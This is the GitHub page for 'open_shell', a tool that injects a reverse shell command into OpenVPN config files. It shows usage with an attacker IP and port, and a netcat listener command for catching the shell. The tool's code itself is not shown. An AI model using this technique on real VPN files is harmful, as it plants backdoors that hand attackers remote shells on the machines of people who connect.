Skip to content

open_shell is a tool to inject a reverse shell command to open_vpn config file

0xF55/open_shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

open_shell

image

open_shell is a tool to inject a reverse shell command to open_vpn config file

Usage: python open_shell.py [path_to_file.ovpn] [attacker_ip] [attacker_port] [os] -> (windows,linux)

Example: python open_shell.py vpn_file.ovpn 192.168.1.8 4444 linux

Attacker: nc -nvlp 4444

[WARNING] This Tool Only For Educational Purposes Only,You are responsible for using the tool.

About

open_shell is a tool to inject a reverse shell command to open_vpn config file

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages